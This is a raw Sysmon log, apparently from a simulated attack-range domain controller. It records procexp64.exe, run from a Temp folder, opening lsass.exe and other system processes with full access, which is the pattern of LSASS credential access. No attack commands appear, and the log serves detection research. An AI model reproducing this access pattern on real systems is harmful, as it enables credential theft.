15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791346Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791345Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791344Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791343Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791342Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791341Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791340Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791339Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791338Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.298{732C744F-3266-6010-DEA2-00000000A301}61124768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791337Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.142{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3266-6010-DEA2-00000000A301}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791336Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.142{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791335Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.142{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791334Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.142{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791333Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.142{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791332Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.142{732C744F-1517-600B-0500-00000000A301}640656C:\Windows\system32\csrss.exe{732C744F-3266-6010-DEA2-00000000A301}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791331Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.142{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3266-6010-DEA2-00000000A301}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000791330Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.142{732C744F-3266-6010-DEA2-00000000A301}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000791594Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791593Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+cbf3f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+cc19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+cc305|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77ae5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791592Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x101450C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b31a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791591Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791590Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791589Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791588Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791587Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791586Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791585Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791584Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791583Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791582Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791581Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791580Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 